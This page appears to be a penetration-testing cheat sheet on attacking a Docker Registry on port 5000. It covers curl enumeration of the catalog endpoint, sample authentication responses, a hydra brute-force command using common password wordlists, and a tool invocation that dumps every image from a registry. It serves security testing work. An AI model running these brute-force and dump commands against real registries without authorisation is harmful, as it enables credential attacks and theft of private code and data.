PentOpsVault @syztem4our666

PentOpsVault
Pentesting NetworksPentesting Ports

Port 5000/Docker Registry

Pentesting-Ports

Introduction

A Docker registry is a repository for Docker images. Docker images are essentially snapshots of a Docker container, which is a lightweight, standalone, executable package that includes everything needed to run a piece of software, including the code, runtime, libraries, and dependencies. A Docker registry stores these images, allowing users to push and pull images to and from it. This enables teams to share and distribute their Docker images easily

Table of Contents

Default port: 5000
 
PORT    STATE SERVICE  VERSION
5000/tcp open  http    Docker Registry (API: 2.0)

Pentesting Docker Registry

Discover

/v2/
/v2/_catalog

Enumeration

curl -s http://IP:5000/v2/_catalog

Authentication

Docker registry may also be configured to require authentication:

curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
#If no authentication required
{"repositories":["alpine","ubuntu"]}

BruteForce Docker Registry

hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt IP -s 5000 https-get /v2/

DockerRegistryGrabber

With access to the docker registry with this tool https://github.com/Syzik/DockerRegistryGrabber you can dump all files from the registry.

usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header]
              [--list | --dump_all | --dump DOCKERNAME]
              url
drg.py: error: the following arguments are required: url
python3 drg.py https://IP-URL -U 'USERNAME' -P 'PASSWORD' --dump_all

Previous

Enumeration with Nmap

Next

Port 88/Kerberos

On this page

IntroductionTable of ContentsPentesting Docker RegistryDiscoverEnumerationAuthenticationBruteForce Docker RegistryDockerRegistryGrabber
Edit on GitHub